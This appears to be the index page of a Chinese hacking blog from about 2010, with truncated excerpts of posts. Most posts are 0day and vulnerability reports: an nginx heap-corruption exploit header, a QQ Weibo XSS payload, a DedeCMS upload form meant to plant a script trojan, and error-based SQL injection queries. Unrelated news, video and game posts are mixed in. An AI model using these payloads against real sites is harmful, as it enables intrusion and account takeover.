Nginx v0.6.38 Heap Corruption Exploit: #!/usr/bin/env python # # Exploit Title: nginx heap corruption # Date: 08/26/2010 # Author: aaron conole <[email]apconole@yahoo.com[/email]> # Software Link: [url]http://nginx.org/download/nginx-0.6.38.tar.gz[/url] # Version: <= 0.6.38, <= 0.7.61 # Tested on: BT4R1 running nginx 0.6.38 locally # CVE: 2009-2629 # # note: this was written and tested against BT4. This means it's an # intel x86 setup (ie: offsets
【漏洞】秀影电影程序VODCMS 6.0.4 bugs
任意删用户,任意改用户密码bug,及其他暴路径bug api/uc.php: $code = $_GET['code']; //code未过滤 parse_str(authcode($code, 'DECODE', UC_KEY), $get); //覆盖$get数组,注意它用了自
【Oday】zen cart 1.38a以下 通杀ODAY
漏洞1: 不是:“Remote Code Execution Exploit”,“Remote SQL Execution Exploit” 而是FCK的漏洞。呵呵,我搜索了一下没人发表我发出来。 <form
【事件】新网(xinnet) xinnet.com 被黑
http://domain.xinnet.com/hack.txt 备注:2010-8-31 8:09:21 检查,黑页依旧存在。
【事件】菲律宾政府网站遭黑客攻击
新浪科技讯 北京时间8月30日上午消息,据国外媒体报道,菲律宾政府的主要信息网站一度因黑客攻击而无法访问。菲律宾政府于当地时间周日发布命令,要
【PHP】Discuz 发贴机器人源码
标题:[原创] Discuz 发贴机器人源码,补充在指定楼层发帖回复 内容: #!/usr/bin/perl use strict; use warnings; use LWP; use HTTP::Cookies; my $browser=LWP::UserAgent->new; my $new_agent='Mozilla/5.0'; $browser->agent($new_agent); #Proxy:如果你的IP封了,呵呵! #$browser->proxy('http','your ip'); $browser->cookie_jar(HTTP::Cookies->new( 'file'=>'im286.lwp', 'autosave'=>1)); push @{$browser->requests_redirectable},"POST";
【技巧】联合国网站一个小小的Bug
蛋疼的“伟大娃娃”发现的。 实际上原理非常简单,应该是自定义返回信息没有做任何过滤这类的,根本不存在任何漏洞不漏洞的问题。这种事经常有,百
【转载】反射型跨站脚本攻击的利用解析
我思考了很久才把这里面的错综复杂的关系整清楚,我想很多人看我下面的paper会睡着,或者干脆“一目百行”的跳过去,但如果你真的想弄懂,请调
【视频】志村大爆笑 - 保安检查员
【漏洞】QQ微博XSS WORM一枚
update(8.29): 已修复 发视频处插如下代码:http://www.tudou.com/programs/view/TLpmMpTY0
【漏洞】QQ微博XSS
http://www.tudou.com/programs/view/TLpmMpTY0eY/"><img src=# onerror='document.body.innerHTML=document.write("hacked !")'> 很鸡肋的xss...
【Oday】凹丫丫新闻发布系统注入Oday
系统主要漏洞是cookie注入,总的有两处,我们先来看看防注入代码: <% Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name '------定义部份 头---------------
【原创】垃圾电信换新手法网页右下角狂弹广告
中国电信个狗日的,既然做出来着这种垃圾无耻下流的东西,他妈的就不要怕人骂你祖宗十八代。 我们掏钱买的是宽带服务,不是花钱看广告! 网页右下角
【视频】暴爽纪录片“毁灭瞬间”第二集
《Destroyed in Seconds 毁灭瞬间》 基本信息: 影片名称:毁灭瞬间 电影类型:记录片 出产地区:欧美 上映频道:Discovery探索频道 简介: "
看雪论坛精华10在线WEB版终于发布了
刚才在看雪逆向群里,收到一条消息,看雪论坛精华10在线WEB版终于发布了。我看了看很不错,内容也很不错。主要分为这几个板块,喜欢的看下: 基
【漏洞】创力CMS留言板跨站漏洞
漏洞分析:write.asp reply.asp -------------------------------------------------------------------- 由于留言标题直接插入更新语句,未进行任何过滤,导致XSS跨站漏洞 漏洞利用
【漏洞】酷狗存在严重的XSS和Url跳转漏洞
博主补充: 你就没有测试一下发图片的地方么?非要搞得那么复杂。哎~ 哎,这种垃圾漏洞,哎,不想多说什么了,太简单了: 同时演示XSS和Url
【转载】DedeCmsV5.6 本地包含里的上传漏洞
之前就发现了这本地包含的利用方法: <form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch"> <input type="hidden" name="newname" value="1.asa"> <input type="file" name="uploadfile"> <input type="submit" value="搜索" name="QuickSearchBtn"> </form> 上传一个图片木马(只改后辍名为图片类型就行),即可在
3D再现菲律宾绑架案 车厢内杯具大公开
3D再现菲律宾绑架案 车厢内杯具大公开 港康泰旅行团马尼拉遭魔警胁持7 - 车厢悲剧实况大公开 魔警刹那疯 车厢变屠房 康泰旅游巴在菲律宾马尼拉被
子强奸多名儿童受审 曾自残身体谎称被逼供
信息时报讯 (记者 魏徽徽 实习生 姜淑娟) 丧心病狂的强奸犯以给校长送资料、帮忙采集标本为名,将多名小学生诱骗至隐蔽的白云山脚下的树林等地实施奸淫,
花了一晚上时间,对博客系统大更新,更新为v2.0
抽出了一晚上时间,对目前的博客系统进行升级,升级功能如下: 增加了功能,广告功能(已投放了广告,大家可以看到效果:1.文章顶部 2.文章底部)
【事件】诺基亚N8-00创熠发布会 却成黄片直播
直播A片场面截屏 eNet硅谷动力手机频道对诺基亚N8发布会给予了高度重视,并在线观看发布会视频介绍。出乎编辑意料的是,上午10:30分左右发
【Bat】扫描内网指定用户能获取管理权限的机器
一个BAT脚本,自动获取内网机器列表,自动判断在线,自动扫描然后记录到日志....... 自动修正域名,自动判断域。。。不废话了,发代码 =========================user.txt========================= 格式
【视频】永远不会掉下来的纸飞机 - 折纸滑翔机
永远不会掉下来的纸飞机,有趣的折纸滑翔机,视频的后半段有详细的原理介绍。
求生之路2新地图一四九(One 4 Nine)详细介绍
一四九(One 4 Nine): In the Nevada Desert, the U.S. Army have built a Military base around an ancient 'alien tomb' and after years of trying have managed to open it. Four survivors heard rumors of a fortified safe zone in the base, but have no knowledge of the tomb nor what will await them upon arrival... 在
【音乐】来几首珍藏了很久了,超震撼的歌
热血沸腾的古战场(原始名字不知道,偶然收集的): 出埃及记-马克西姆(很有名了): 还有很多,就不一一贴了: Archlord (霸王).mp3 Battle Without Honor or Humanity 杀死比
求生之路1和2即将推出新DLC“The Sacrifice”
V社新的DLC叫做"The Sacrifice"(牺牲)。将会同时在求生之路1和2上发布,依旧免费。 求生之路1的"The Sacrifice
【转载】dvbbs php2.0 的几处 0day
作者:T00ls 核心成员 Xhm1n9 时间:2010.8.19 1:joinvipgroup.php //注入 function up_vipuser(){ global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser; $groupid=$_POST['vipgroupid']; $btype=$_POST['Btype']; $vipmoney=$_POST['vipmoney']; $vipticket=$_POST['vipticket']; if($groupid==0 or $vipmoney<0 or $vipticket<0){echo "@@"; showmsg($lang['join.info4']);
【转载】Ecshop lib_common.php注入
昨天无意间读到: http://www.packetstormsecurity.org/papers/database/PT-devteev-FAST-blind-SQL-Injection.txt 发现原来可以这样注入: MySQL >= 5.0: 执行: select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x; 或: select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 会报错: Duplicate entry '5.1.30-community1' for key
【漏洞】百度官方空间链接跨站跳转漏洞
漏洞描述: 百度官方空间链接跨站跳转漏洞 漏洞出自: www.yes-cn.net 漏洞详情: 首先,我们构造这样一个链接: http://hi.baidu.com/baidu/album/%C4%AC%C8%CF%CF%E0%B2%E1#.yes-cn.net 为了更掩饰后面的“yes-cn.net”